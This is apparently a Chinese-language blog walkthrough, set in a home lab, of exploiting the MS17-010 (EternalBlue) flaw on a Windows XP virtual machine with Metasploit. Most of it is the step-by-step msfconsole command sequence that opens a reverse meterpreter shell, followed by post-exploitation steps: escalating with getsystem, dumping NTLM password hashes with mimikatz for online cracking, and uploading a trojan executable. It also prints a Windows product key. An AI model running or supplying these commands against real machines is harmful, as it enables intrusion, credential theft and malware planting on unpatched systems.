日期:2018-07-21 21:09:16
介紹:永恆之藍利用的 ms17-010 漏洞,拿 Shell、查看文件、獲取密碼。
0x01、實驗環境
攻擊機
系統:macOS Sierra 10.12.5
IP:10.211.55.2
靶機
系統:Windows XP SP3 英文版(虛擬機)
IP:10.211.55.19
激活碼:HTXH6-2JJC4-CDB6C-X38B4-C3GF3
0x02、使用 msf 攻擊 XP
在 mac
中使用 metasploit
和 kali
中使用 metasploit
去做攻擊,流程是一樣的,按照以下步驟進行即可。
首先在命令行輸入 msfconsole
進入 metasploit
。

進入后,使用 search
命令,查找與 ms17-010
相關的模塊。

依次進行以下操作。
# 選擇 msf 相關的模塊
use exploit/windows/smb/ms17_010_psexec
# 查看需要設置的信息
show options
# 設置靶機的 IP 和端口
set rhosts 10.211.55.19
set rport 445
# 設置攻擊使用的 payload
set payload windows/meterpreter/reverse_tcp
set lhost 10.211.55.2
set lport 4444
# 進行攻擊
exploit
成功彈回 shell。

0x03、其他操作
查看靶機文件
查看靶機文件,可直接在 shell
中執行 cmd
命令。

也可以直接在 meterpreter
中操作。

提取 Windows 密碼
提取 Windows 密碼的 hash:
密碼哈希有三種方式:LM、NTLM、NTLMv2,LM 存儲的時候,7個字符一組(如果密碼長度是14位,就會分成兩組),NTLM 是整體轉換。
使用工具 mimikatz,獲取到 ntlm 的值,
然后去 http://www.objectif-securite.ch/en/ophcrack.php 解密即可。
相關命令:
getsystem
load mimikatz
msv

電腦鎖屏
shell
echo rundll32.exe user32.dll LockWorkStation > 1.bat
1.bat
植入木馬
upload /tmp/muma.exe c:\\
0x04、其他
利用 meterpreter 還可以進行監聽鍵盤、獲取圖形化界面等操作,
此處不一一演示,有興趣可上網查詢相關資料。